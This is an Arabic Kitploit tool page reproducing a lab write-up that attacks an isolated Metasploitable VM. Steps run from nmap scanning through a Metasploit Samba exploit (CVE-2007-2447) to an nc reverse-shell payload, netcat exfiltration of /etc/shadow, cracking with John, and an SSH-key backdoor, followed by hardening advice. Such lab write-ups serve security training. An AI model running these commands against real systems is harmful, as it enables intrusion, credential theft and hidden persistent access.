Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
metasploitable-pentest-lab — اختبار اختراق كامل على Metasploitable: استطلاع باستخدام nmap، استغلال باستخدام Metasploit (CVE-2007-2447)، استخراج وكسر كلمات المرور، واستمرارية عبر SSH | Kitploit
أدوات/GitHubGitHub/mboatella25/metasploitable-pentest-lab
كسر كلمات المرورتصعيد الامتيازاتالاستطلاعآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةجمع المعلوماتما بعد الاستغلال

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
اختبار الاختراق
التعلم والتعليم
مختبرات وتدريب عملي
GitHubmboatella25/metasploitable-pentest-lab

metasploitable-pentest-lab

اختبار اختراق كامل على Metasploitable: استطلاع باستخدام nmap، استغلال باستخدام Metasploit (CVE-2007-2447)، استخراج وكسر كلمات المرور، واستمرارية عبر SSH

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

استغلال الثغرات الأمنية في Metasploitable

الدورة الكاملة لهجوم حقيقي على بيئة خاضعة للتحكم ومعزولة: تجهيز المختبر، الاستطلاع باستخدام nmap، ترتيب أولويات سطح الهجوم، الربط مع CVE، الاستغلال باستخدام Metasploit، ما بعد الاستغلال، استخراج بيانات الاعتماد وتكسيرها، والاستدامة عبر حقن مفتاح SSH.

البنية: Kali Linux (المهاجم) ضد Metasploitable (الهدف)، شبكة host-only معزولة

1. تجهيز البيئة

  • المهاجم: Kali Linux — msfconsole, nmap, John the Ripper.
  • الهدف: Metasploitable 1 — Ubuntu 8.04 (2010)، بدون تحديثات أمنية، وتحمل ثغرات CVE متعددة معروفة.
  • الشبكة: host-only، كلا الجهازين الافتراضيين معزولان عن أي شبكة حقيقية (192.168.64.0/24). عنوان IP للضحية: 192.168.64.3.

التحقق من الاتصال بين الجهازين الافتراضيين

2. الاستطلاع باستخدام Nmap

فحص الإصدارات لتحديد ما هو مكشوف بدقة — الثغرات الأمنية تصيب إصدارات محددة، لا خدمات بشكل مجرد:

root@kitploit:~
nmap -sV 192.168.64.3

اثنا عشر منفذًا مفتوحًا، جميعها بإصدارات قديمة وقابلة للاستغلال.

3. ترتيب أولويات سطح الهجوم

بدلًا من مهاجمة أول منفذ مفتوح، صنّفت الخدمات حسب نوع المخاطر قبل اختيار الهدف:

  • الوصول عن بُعد (22، 23): يكشف Telnet بيانات الاعتماد كنص صريح؛ OpenSSH 4.7p1 إصدار قديم جدًا.
  • طبقة تطبيقات الويب (80، 8180): Apache 2.2.8 متأخر جدًا عن الإصدار المستقر؛ Tomcat ببيانات اعتماد ضعيفة وثغرة RCE محتملة.
  • قواعد بيانات مكشوفة (3306): MySQL 5.0.51a، إصدار قديم مع وصول مباشر إلى البيانات.
  • الملفات المشتركة / الشبكة الداخلية (139، 445): Samba، تاريخيًا أحد أكثر الخدمات استغلالًا، مع CVE وExploit عامة معروفة.

الهدف المحدد: Samba 3.0.20-Debian — يجمع بين إصدار يحمل ثغرة حرجة موثقة، وExploit متاح في Metasploit، وتنفيذ كود دون الحاجة إلى مصادقة مسبقة: أعلى تأثير بأعلى موثوقية.

4. رسم خريطة الثغرة

تأكيد الإصدار الدقيق عبر محرك سكربتات Nmap (NSE):

root@kitploit:~
nmap -p 139,445 --script=smb-os-discovery 192.168.64.3
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)

إن Samba 3.0.20 عرضة لـ CVE-2007-2447: معامل username map script لا يتحقق من الإدخال، ويمكن للمهاجم حقن أوامر shell مباشرة في حقل اسم المستخدم. وبما أن عملية الربط تحدث قبل تسجيل الدخول، فلا حاجة لاسم مستخدم ولا كلمة مرور صالحة.

سجل CVE-2007-2447: RCE عبر username map script في Samba

5. الاستغلال باستخدام Metasploit

root@kitploit:~
msfconsole

إقلاع Metasploit Framework

البحث عن الوحدة المناسبة:

root@kitploit:~
msf > search type:exploit samba

البحث عن Exploits الخاصة بـ Samba — exploit/multi/samba/usermap_script، تصنيف excellent

الإعداد والتنفيذ:

root@kitploit:~
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set RHOSTS 192.168.64.3
msf exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.64.4:4444
[*] Command shell session 1 opened

تحقق فوري من الصلاحيات — تمنح الثغرة وصول root مباشرًا، دون الحاجة إلى تصعيد صلاحيات لاحق:

root@kitploit:~
whoami   → root
uname -a → Linux metasploitable 2.6.24-16-server (kernel de 2008)

Shell مُتحصَّل عليها: whoami يُرجع root منذ اللحظة الأولى

6. ما بعد الاستغلال: كيف حدث الأمر فعليًا

عند فحص العمليات على الضحية يمكن رؤية الحمولة (payload) المحقونة نفسها وهي تعمل:

root@kitploit:~
ps aux | grep samba
root  4931  sh -c /etc/samba/scripts/mapusers.sh "/=`nohup mkfifo /tmp/iftpe; nc 192.168.64.4 4444 0</tmp/iftpe | /bin/sh >/tmp/iftpe 2>&1; rm /tmp/iftpe`"

احتوى اسم المستخدم المُرسَل على الأمر نفسه (/=`...`): مرّره Samba دون تعقيم إلى shell، فأنشأت أنبوبًا (pipe) عبر mkfifo، وفتحت اتصالًا عائدًا إلى Kali باستخدام netcat، وربطت /bin/sh بذلك الأنبوب — تنفيذ كود عن بُعد كامل، سطرًا بسطر.

تعداد الخدمات الداخلية باستخدام netstat -tulnp: ظهر MySQL وهو يستمع على 0.0.0.0:3306 — مكشوف لأي جهاز على الشبكة، وليس لـ localhost فقط.

7. استخراج بيانات الاعتماد وتكسيرها

بدلًا من محاولة التكسير على الضحية نفسها (يستهلك المعالج، ويولّد ضوضاء، ويترك آثارًا)، استخرجت التجزئات (hashes) ونقلتها إلى Kali لمعالجتها دون اتصال (offline):

root@kitploit:~
cat /etc/shadow
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::

تجزئات (Hashes) كلمات المرور المستخرجة من /etc/shadow

النقل عبر netcat والتجهيز لـ John the Ripper:

root@kitploit:~
# En Kali:
nc -lvnp 4444 > shadow.txt
# En la víctima:
cat /etc/shadow | nc 192.168.64.4 4444

unshadow passwd.txt shadow.txt > hashes.txt
john hashes.txt

يشغّل John ثلاث مراحل تلقائيًا (وضع single مع معلومات من المستخدم نفسه، وقاموس كلمات، وقوة عمياء متزايدة). النتيجة: تكسير 6 من 7 كلمات مرور، بما في ذلك بيانات اعتماد قابلة لإعادة الاستخدام لـ SSH وMySQL وFTP.

John the Ripper: تكسير 6 كلمات مرور

8. الحركة الجانبية والاستدامة (الثبات)

باستخدام بيانات الاعتماد المكسورة، وصول SSH مباشر كمستخدم شرعي:

root@kitploit:~
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa [email protected]

وصول SSH باستخدام بيانات اعتماد مكسورة

لكي لا أعتمد على كلمة مرور قد تُغيَّر، ولّدت زوج مفاتيح خاصًا بي وأضفته إلى authorized_keys على الضحية — باب خلفي يبقى حتى بعد تغيير كلمات المرور ولا يولّد تنبيهات هجمات القوة العمياء:

root@kitploit:~
ssh-keygen -t rsa -b 2048 -f lab_key
cat lab_key.pub >> ~/.ssh/authorized_keys   # ejecutado en la víctima, ya comprometida

الوصول لاحقًا، دون كلمة مرور:

root@kitploit:~
ssh -i lab_key -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa [email protected]

وصول SSH مستدام دون كلمة مرور، مصادقة عبر مفتاح

النتائج

  • اثنا عشر منفذًا مفتوحًا، جميعها بإصدارات قديمة — لم يكن سطح الهجوم عيبًا واحدًا، بل تراكم سنوات من الخدمات دون تحديث.
  • ثغرة تنفيذ كود عن بُعد قابلة للاستغلال دون أي نوع من المصادقة، وهو أسوأ سيناريو ممكن لخدمة مكشوفة.
  • بيانات اعتماد ضعيفة ومعاد استخدامها بين الخدمات (SSH، MySQL، FTP) — اختراق نقطة واحدة منح الوصول إلى عدة نقاط.
  • غياب تام لتقسيم الشبكة والتصلبة الأساسية (hardening) (قواعد بيانات مكشوفة على 0.0.0.0، بروتوكولات قديمة مثل Telnet نشطة).

توصيات أمنية

إزالة البروتوكولات غير الآمنة مثل Telnet، وتحديث الخدمات الحرجة والنواة نفسها، وتقييد التعرض المباشر لقواعد البيانات، وتطبيق تقسيم الشبكة، والأهم من كل ذلك — نظرًا لسهولة تكسير كلمات المرور — فرض سياسات بيانات اعتماد قوية وغير معاد استخدامها بين الخدمات. النوع نفسه من الكشف الذي كان سيمنع هذا الهجوم في بيئة الإنتاج (مراقبة الاتصالات الصادرة الشاذة، وتنبيهات حول nc والـ reverse shells) هو ما أعمل عليه في الجانب الدفاعي في Home SOC Lab.

الاستنتاجات

إن ترتيب الأولويات قبل الهجوم — فهم أي خدمة تحقق أكبر أثر بأعلى موثوقية، بدلًا من تجربة المنافذ عشوائيًا — هو ما قاد مباشرة إلى Samba. أما مرحلة ما بعد الاستغلال، عند رؤية الأمر المحقون نفسه يعمل في ps aux، فهي الأوضح في إظهار لماذا تتحول ثغرة التحقق من الإدخال إلى سيطرة كاملة على النظام. ويوضح الثبات عبر مفتاح SSH أن هدف المهاجم بعد الدخول ليس مجرد «امتلاك الوصول»، بل امتلاكه بشكل صامت ودائم — وهو سبب إضافي لعدم اعتماد الدفاع في العمق على حاجز واحد.

تنزيل الأداة
المنفذالخدمةالإصدار
21/tcpftpProFTPD 1.3.1
22/tcpsshOpenSSH 4.7p1 Debian 8ubuntu1
23/tcptelnetLinux telnetd
80/tcphttpApache httpd 2.2.8
139,445/tcpnetbios-ssnSamba smbd 3.X — الهدف الرئيسي
3306/tcpmysqlMySQL 5.0.51a
8180/tcphttpApache Tomcat/Coyote JSP 1.1